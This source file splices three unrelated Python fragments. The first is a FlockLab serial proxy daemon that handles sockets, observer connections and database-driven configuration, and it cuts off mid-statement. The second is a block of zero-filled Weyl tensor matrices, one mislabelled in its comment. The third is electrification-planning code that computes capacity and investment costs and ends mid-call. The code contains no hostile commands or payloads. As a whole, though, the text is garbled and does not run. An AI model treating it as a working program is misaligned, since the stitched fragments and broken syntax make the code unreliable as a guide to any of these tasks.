CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import os, sys, getopt, traceback, MySQLdb, signal, time, errno, subprocess, logging
import __main__, multiprocessing, queue, threading, select, socket, io
import lxml.etree
import lib.daemon as daemon
import lib.flocklab as flocklab
logger = None
debug = False
stopevent = None
reloadevent = None
##############################################################################
#
# sigterm_handler
#
##############################################################################
def sigterm_handler(signum, frame):
"""If the program is terminated by sending it the signal SIGTERM
(e.g. by executing 'kill') or SIGINT (pressing ctrl-c),
this signal handler is invoked for cleanup."""
# NOTE: logging should not be used in signal handlers: https://docs.python.org/2/library/logging.html#thread-safety
global stopevent
global reloadevent
logger.debug("sigterm_handler: signal %u received" % (signum))
# Signal all threads to stop:
if signum == signal.SIGTERM and stopevent:
stopevent.set()
elif signum == signal.SIGINT and reloadevent:
reloadevent.set()
### END sigterm_handler
##############################################################################
#
# listen_process
#
##############################################################################
def listen_process(port, newConnectionQueue, _stopevent):
while not _stopevent.is_set():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('',port))
sock.settimeout(1)
logger.info("Started socket %s:%d"%('',port))
while not _stopevent.is_set():
sock.listen(1)
try:
connection, address = sock.accept()
except socket.timeout:
continue
connection.settimeout(None)
logger.info("Connection from %s at port %d"%(str(address),port))
address = (address[0], port)
newConnectionQueue.put((connection, address))
logger.info("Listen process on port %d ended." % port)
except:
logger.error("Listen process on port %d: Socket error %s"%(port,str(sys.exc_info()[1])))
time.sleep(5)
### END listen_process
##############################################################################
#
# obs_connect_process
#
##############################################################################
def obs_connect_process(conreqQueue, condoneQueue, _stopevent):
worklist = []
while not _stopevent.is_set():
try:
req = conreqQueue.get(True, 1)
worklist.append(req)
except queue.Empty:
pass
for w in worklist:
if w is None:
worklist = []
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(w)
logger.info("Connected to observer %s on port %d" % (w[0],w[1]))
condoneQueue.put((sock, w))
worklist.remove(w)
except ConnectionRefusedError:
logger.info("Could not connect to observer %s on port %d, will retry later..." % (w[0],w[1]))
time.sleep(5)
except Exception:
logger.warn("Could not connect to observer %s on port %d: %s, %s\n%s" % (w[0], w[1], str(sys.exc_info()[0]), str(sys.exc_info()[1]), traceback.format_exc()))
worklist.remove(w)
### END obs_connect_process
##############################################################################
#
# update_configuration_from_db
#
##############################################################################
def update_configuration_from_db():
# Get needed metadata from database ---
# for all running / preparing tests
# for each observer used in a serial configuration
# (user remoteIp, server port, observer ip, port)
proxystartport = flocklab.config.getint('serialproxy', 'startport')
obsdataport = flocklab.config.getint('serialproxy', 'obsdataport')
proxyConfig = []
logger.debug("Updating configuration from DB...")
try:
(cn, cur) = flocklab.connect_to_db()
cur.execute('SET time_zone="+0:00"')
except:
msg = "Could not connect to database"
logger.error(msg)
flocklab.error_logandexit(msg, errno.EAGAIN)
try:
# Get the XML config from the database:
cur.execute("SELECT `testconfig_xml`, `serv_tests_key` FROM `tbl_serv_tests` WHERE (`test_status` IN ('preparing', 'running') AND `time_end_wish` >= NOW())")
ret = cur.fetchall()
for testconfig in ret:
logger.debug("Create proxy config for test %d" % testconfig[1])
# get slot mappings
cur.execute("SELECT `observer_id`, `ethernet_address`, `slot` FROM `tbl_serv_map_test_observer_targetimages` `a` left join `tbl_serv_observer` `b` ON (`a`.`observer_fk` = `b`.`serv_observer_key`) WHERE `test_fk` = %d" % testconfig[1])
mapret = cur.fetchall()
mapping = {} # dict obsid -> (ip_address, port)
for m in mapret:
if not m[2] is None:
mapping[int(m[0])] = (m[1], obsdataport)
parser = lxml.etree.XMLParser(remove_comments=True)
tree = lxml.etree.fromstring(bytes(bytearray(testconfig[0], encoding = 'utf-8')), parser)
ns = {'d': flocklab.config.get('xml', 'namespace')}
logger.debug("Got XML from database.")
## Process serial configuration ---
srconfs = tree.xpath('//d:serialConf', namespaces=ns)
for srconf in srconfs:
obsids = srconf.xpath('d:obsIds', namespaces=ns)[0].text.split()
remoteIp = srconf.xpath('d:remoteIp', namespaces=ns)
if not remoteIp:
continue # skip
remoteIp = remoteIp[0].text
# Create a pair of FIFO pipes for every observer and start ncat:
for obsid in obsids:
if int(obsid) in mapping:
proxyConfig.append(((remoteIp, proxystartport + int(obsid)),mapping[int(obsid)]))
if len(proxyConfig) == 0:
logger.info("No serial forwarders required.")
else:
logger.debug("Current proxy configuration:")
for pc in proxyConfig:
logger.debug("%s:%d <-> %s:%d" % (pc[0][0],pc[0][1],pc[1][0],pc[1][1]))
return proxyConfig
except MySQLdb.Error as err:
msg = str(err)
logger.error(msg)
flocklab.error_logandexit(msg, errno.EIO)
except:
logger.warning("Error %s: %s" %(str(sys.exc_info()[0]), str(sys.exc_info()[1])))
raise
### END update_configuration_from_db
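# Each proxyConfig entry pairs a user-facing endpoint with an observer
# endpoint (illustrative addresses only):
#   (("192.0.2.10", 50015), ("10.0.1.15", 50100))
#    ^ (remoteIp, proxystartport + obsid)   ^ (observer address, obsdataport)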
##############################################################################
#
# class ProxyConnections
#
##############################################################################
class ProxyConnections():
server_socket_process_list = {} # dict port > process
obs_socket_list = {} # dict (obs,slot) -> socket
server_socket_list = {} # dict (clientaddr, obs, slot) -> socket
client_to_obs = {} # dict obs_socket -> server_socket
obs_to_client = {} # dict server_socket -> obs_socket
proxyConfig = []
addlist = []
removelist = []
op = None
def __init__(self):
# multiprocessing events and queues
# for server socket processes
self.stopevent = multiprocessing.Event()
self.reloadevent = multiprocessing.Event()
self.newConnectionQueue = multiprocessing.Queue()
# for observer reconnect process
self.conreqQueue = multiprocessing.Queue()
self.condoneQueue = multiprocessing.Queue()
# start observer reconnect process
self.op = threading.Thread(target = obs_connect_process, args=(self.conreqQueue,self.condoneQueue,self.stopevent,))
self.op.daemon = True
def reloadConfiguration(self, newconfig):
oldconfig = self.proxyConfig
self.proxyConfig = newconfig
# empty observer request queue
self.conreqQueue.put(None)
# drop old connections
for dc in [c for c in oldconfig if c not in newconfig]:
logger.debug("Drop old connection %s" % str(dc))
self.server_socket_process_list[dc[0][1]][1].set() # set stop event
if dc[0] in self.server_socket_list and self.server_socket_list[dc[0]]:
self.removeHandler(self.server_socket_list[dc[0]])
elif dc[1] in self.obs_socket_list and self.obs_socket_list[dc[1]]:
self.removeHandler(self.obs_socket_list[dc[1]])
for dc in [c for c in oldconfig if c not in newconfig]:
self.server_socket_process_list[dc[0][1]][0].join()
del self.server_socket_process_list[dc[0][1]] # remove the entry from the dictionary
# add new connections
for nc in [c for c in newconfig if c not in oldconfig]:
logger.debug("Add new connection %s" % str(nc))
self.requestListenSocket(nc[0])
self.requestObserverSocket(nc[1])
def requestListenSocket(self, addr):
if not addr[1] in self.server_socket_process_list:
_stopevent = multiprocessing.Event()
lp = threading.Thread(target = listen_process, args=(addr[1],self.newConnectionQueue,_stopevent,))
lp.daemon = True
lp.start()
self.server_socket_process_list[addr[1]] = (lp, _stopevent)
def requestObserverSocket(self, addr):
self.conreqQueue.put(addr)
def getLists(self, is_observer):
if is_observer:
return self.obs_socket_list, self.server_socket_list, self.obs_to_client, self.client_to_obs
else:
return self.server_socket_list, self.obs_socket_list, self.client_to_obs, self.obs_to_client
def removeHandler(self, conn):
        reconnect = None
        reconnectaddr = None  # stays None if conn is not found in the lists below
conn.shutdown(socket.SHUT_RDWR)
conn.close()
# remove from socket list
for l in (self.obs_socket_list, self.server_socket_list):
for k,s in list(l.items()):
if s == conn:
del(l[k])
reconnectaddr = k
break
# if bidirectional, remove also other socket
        if conn in self.client_to_obs: # client connection: remove it
reconnect = False
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(False)
elif conn in self.obs_to_client: # observer connection. try to reconnect with timeout
reconnect = True
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(True)
else:
return
self.removelist.append(conn)
self.removelist.append(src_to_dst[conn])
del(dst_to_src[src_to_dst[conn]])
del(src_to_dst[conn])
if reconnect and reconnectaddr:
connectionConfig = [p for p in self.proxyConfig if p[1] == reconnectaddr]
if len(connectionConfig) > 0:
self.requestObserverSocket(connectionConfig[0][1])
def addHandler(self, conn, addr, is_observer):
if is_observer:
connectionConfig = [p[0] for p in self.proxyConfig if p[1] == addr]
else:
connectionConfig = [p[1] for p in self.proxyConfig if p[0] == addr]
if len(connectionConfig) > 0:
src_list, dst_list, src_to_dst, dst_to_src = self.getLists(is_observer)
connectionConfig = connectionConfig[0]
if addr in src_list:
conn.shutdown(socket.SHUT_RDWR)
conn.close()
logger.info("Connection rejected, already exists")
return
src_list[addr] = conn
#logger.debug("src_list is %s" % str(src_list))
if connectionConfig in dst_list:
src_to_dst[conn] = dst_list[connectionConfig]
dst_to_src[dst_list[connectionConfig]] = conn
# forward on this connection
self.addlist.append(conn)
self.addlist.append(src_to_dst[conn])
logger.info("Established connection %s" % (str((connectionConfig, addr))))
else:
conn.close()
logger.info("Connection request from %s ignored" % addr[0])
def getChanges(self):
a = self.addlist
r = self.removelist
self.addlist = []
self.removelist = []
return a, r
def forward(self, data, src_conn):
if src_conn in self.client_to_obs and self.client_to_obs[src_conn]:
self.client_to_obs[src_conn].send(data)
elif src_conn in self.obs_to_client and self.obs_to_client[src_conn]:
self.obs_to_client[src_conn].send(data)
def run(self):
global stopevent
global reloadevent
stopevent = self.stopevent
reloadevent = self.reloadevent
self.op.start()
logger.info("FlockLab serial proxy started.")
# infinite while loop
inputs = [self.newConnectionQueue._reader, self.condoneQueue._reader]
while not stopevent.is_set():
try:
(readable, writable, ex) = select.select(inputs,[],[],10) # 10s timeout
            except select.error as
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Weyl curvature tensor "dddd" type class object.
self.weyl_tensor_dddd = Matrix([
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Riemann curvature tensor "uddd" type class object.
self.weyl_tensor_uddd = Matrix([
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
],
[
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
],
[
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ],
[ 0, 0, 0, 0 ]
]
]
])
# Declares Weyl curvature tensor "dduu" type class object.
self.weyl_tensor_dduu = Matrix([[[[0 for _ in range(4)] for _ in range(4)] for _ in range(4)] for _ in range(4)])
mintraveldistance += 0.95
if iteration > 300:
iteration = 0
conflictlimit += 1
mintraveldistance = self.df[SET_TRAVEL_HOURS].min()
if conflictlimit > 0:
elec_loop += 1
else:
still_looking = False
print("The electrification rate achieved is {}".format(elecrate))
### Fast method attempt
# self.df['InvestmentCapita'] = self.df[SET_INVESTMENT_COST + "{}".format(year)] / self.df[SET_POP+"{}".format(year)]
# sorted_investment = self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)].copy()
# sorted_investment.sort_values(inplace=True)
# investment_pop_break = eleclimit * self.df[SET_POP+"{}".format(year)].sum()
# cumulative_pop = 0
# ii = 0
# while cumulative_pop < investment_pop_break:
# cumulative_pop += sorted_investment.iloc[ii]
# ii += 1
# investment_cutoff = sorted_investment.iloc[ii - 1]
#
# self.df.loc[self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)] <= investment_cutoff, SET_LIMIT + "{}".format(year)] = 1
# self.df.loc[self.df[SET_MIN_OVERALL_LCOE + "{}".format(year)] > investment_cutoff, SET_LIMIT + "{}".format(year)] = 0
#
# elecrate = sum(self.df[self.df[SET_LIMIT + "{}".format(year)] == 1][SET_POP + "{}".format(year)]) / \
# self.df[SET_POP + "{}".format(year)].sum()
# print("The electrification rate achieved is {}".format(elecrate))
###
def final_decision(self, mg_hydro_calc, mg_wind_calc, mg_pv_calc, sa_pv_calc, mg_diesel_calc,
sa_diesel_calc, grid_calc, year, end_year, timestep):
"""" ... """
logging.info('Determine final electrification decision')
self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] = \
self.df.apply(lambda row: 1
if (row[SET_ELEC_FUTURE_GRID + "{}".format(year)] == 1) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(year)] == 1 and
row[SET_GRID_REACH_YEAR] <= year)
else 0, axis=1)
self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] = \
self.df.apply(lambda row: 1
if (row[SET_ELEC_FUTURE_OFFGRID + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(year)] != 1) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_ELEC_FINAL_GRID + "{}".format(year)] == 0) or
(row[SET_LIMIT + "{}".format(year)] == 1 and
row[SET_MIN_OVERALL_CODE + "{}".format(
year)] == 1 and
row[SET_GRID_REACH_YEAR] > year)
else 0, axis=1)
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 1) &
(self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] == 1),
SET_ELEC_FINAL_CODE + "{}".format(year)] = 1
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 1) &
(self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] == 1),
SET_ELEC_FINAL_CODE + "{}".format(year)] = self.df[SET_MIN_OFFGRID_CODE + "{}".format(year)]
self.df.loc[(self.df[SET_LIMIT + "{}".format(year)] == 0) &
(self.df[SET_ELEC_FINAL_GRID + "{}".format(year)] == 0) &
(self.df[SET_ELEC_FINAL_OFFGRID + "{}".format(year)] == 0),
SET_ELEC_FINAL_CODE + "{}".format(year)] = 99
logging.info('Calculate new capacity')
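# New capacity is derived from annual demand: energy per cell (kWh/year) divided by
# HOURS_PER_YEAR * capacity factor * base-to-peak load ratio * (1 - distribution losses).
# For the PV options (codes 3 and 5) the capacity factor is approximated as GHI / HOURS_PER_YEAR.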
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 1, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * grid_calc.capacity_factor * grid_calc.base_to_peak_load_ratio *
(1 - grid_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 7, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * mg_hydro_calc.capacity_factor * mg_hydro_calc.base_to_peak_load_ratio *
(1 - mg_hydro_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 5, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * (self.df[SET_GHI] / HOURS_PER_YEAR) * mg_pv_calc.base_to_peak_load_ratio *
(1 - mg_pv_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 6, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * self.df[SET_WINDCF] * mg_wind_calc.base_to_peak_load_ratio *
(1 - mg_wind_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 4, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * mg_diesel_calc.capacity_factor * mg_diesel_calc.base_to_peak_load_ratio *
(1 - mg_diesel_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 2, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * sa_diesel_calc.capacity_factor * sa_diesel_calc.base_to_peak_load_ratio *
(1 - sa_diesel_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 3, SET_NEW_CAPACITY + "{}".format(year)] = (
(self.df[SET_ENERGY_PER_CELL + "{}".format(year)]) /
(HOURS_PER_YEAR * (self.df[SET_GHI] / HOURS_PER_YEAR) * sa_pv_calc.base_to_peak_load_ratio *
(1 - sa_pv_calc.distribution_losses)))
self.df.loc[self.df[SET_ELEC_FINAL_CODE + "{}".format(year)] == 99, SET_NEW_CAPACITY + "{}".format(year)] = 0
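# Technology codes, as used by the calculators above: 1 = grid, 2 = stand-alone diesel,
# 3 = stand-alone PV, 4 = mini-grid diesel, 5 = mini-grid PV, 6 = mini-grid wind,
# 7 = mini-grid hydro, 99 = unelectrified.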
def res_investment_cost(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 2:
return sa_diesel_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
travel_hours=row[SET_TRAVEL_HOURS],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 3:
return sa_pv_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_GHI] / HOURS_PER_YEAR,
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 6:
return mg_wind_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_WINDCF],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 4:
return mg_diesel_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
travel_hours=row[SET_TRAVEL_HOURS],
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 5:
return mg_pv_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
capacity_factor=row[SET_GHI] / HOURS_PER_YEAR,
conf_status=row[SET_CONFLICT],
get_investment_cost=True)
elif min_code == 7:
return mg_hydro_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
mv_line_length=row[SET_HYDRO_DIST],
get_investment_cost=True)
elif min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost=True)
else:
return 0
logging.info('Calculate investment cost')
self.df[SET_INVESTMENT_COST + "{}".format(year)] = self.df.apply(res_investment_cost, axis=1)
def res_investment_cost_lv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_lv=True)
else:
return 0
logging.info('Calculate LV investment cost')
self.df['InvestmentCostLV' + "{}".format(year)] = self.df.apply(res_investment_cost_lv, axis=1)
def res_investment_cost_mv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_mv=True)
else:
return 0
logging.info('Calculate MV investment cost')
self.df['InvestmentCostMV' + "{}".format(year)] = self.df.apply(res_investment_cost_mv, axis=1)
def res_investment_cost_hv(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
grid_cell_area=row['GridCellArea'],
conf_status=row[SET_CONFLICT],
additional_mv_line_length=row[SET_MIN_GRID_DIST + "{}".format(year)],
elec_loop=row[SET_ELEC_ORDER + "{}".format(year)],
get_investment_cost_hv=True)
else:
return 0
logging.info('Calculate HV investment cost')
self.df['InvestmentCostHV' + "{}".format(year)] = self.df.apply(res_investment_cost_hv, axis=1)
def res_investment_cost_transformer(row):
min_code = row[SET_ELEC_FINAL_CODE + "{}".format(year)]
if min_code == 1:
return grid_calc.get_lcoe(energy_per_cell=row[SET_ENERGY_PER_CELL + "{}".format(year)],
start_year=year - timestep,
end_year=end_year,
people=row[SET_POP + "{}".format(year)],
new_connections=row[SET_NEW_CONNECTIONS + "{}".format(year)],
total_energy_per_cell=row[SET_TOTAL_ENERGY_PER_CELL],
prev_code=row[SET_ELEC_FINAL_CODE + "{}".format(year - timestep)],
num_people_per_hh=row[SET_NUM_PEOPLE_PER_HH],
